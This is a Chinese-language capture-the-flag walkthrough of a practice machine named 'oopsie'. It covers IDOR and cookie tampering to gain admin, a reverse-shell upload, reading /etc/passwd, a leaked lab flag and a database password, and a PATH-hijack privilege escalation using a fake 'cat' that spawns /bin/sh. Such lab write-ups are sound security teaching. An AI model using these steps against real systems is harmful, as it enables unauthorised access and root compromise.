使用 nmap 掃描
發現 80 端口開放 http
打開網頁
發現沒什麼東西
打開 F12 看到裡面有個類似登錄的地址
打開後,還真是。。
嘗試
admin'# 無效
使用來賓賬號登錄
成功;
嘗試文件上傳,發現需要 admin 賬號
在 Account 發現信息,發現上方地址欄 ID=2 
id 改為 1 後,發現 admin 相關信息
一番查找,在 F12 裡看到 cookie 可以借此修改,將信息改為 admin 的信息
再次訪問文件上傳,通過了
生成 shell,將 IP 和端口修改為自己監聽的端口,並上傳
接下來,監聽自己之前在文件中設置的端口
使用 gobuster 進行地址爆破
這裡反彈後拿到 shell,不過這個 shell
python3 打開偽終端
在 /etc/passwd 文件下看到信息
獲得普通用戶密鑰
www-data@oopsie:/home/robert$ cat user.txt
cat user.txt
f2c74ee8db7983851ab2a96a44eb7981
在此目錄下的 db.php 發現用戶密碼
www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
cat db.php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>
切換到 robert 賬號
export PATH=/tmp:$PATH // 將 /tmp 目錄設置為環境變量
cd /tmp/ // 切換到 /tmp 目錄下
echo '/bin/sh' > cat // 在此構造惡意的 cat 命令
chmod +x cat // 賦予執行權限
使用上面命令,成功提權 ROOT
因為,我們修改了環境變量,所以調用的 cat 是惡意的,所以查看不了文件,這裡使用 tac 命令查看。tac 是將行數倒著輸出,並並不會將一句話的每個字符倒序輸出,這裡直接 tac 查看即可
==================================================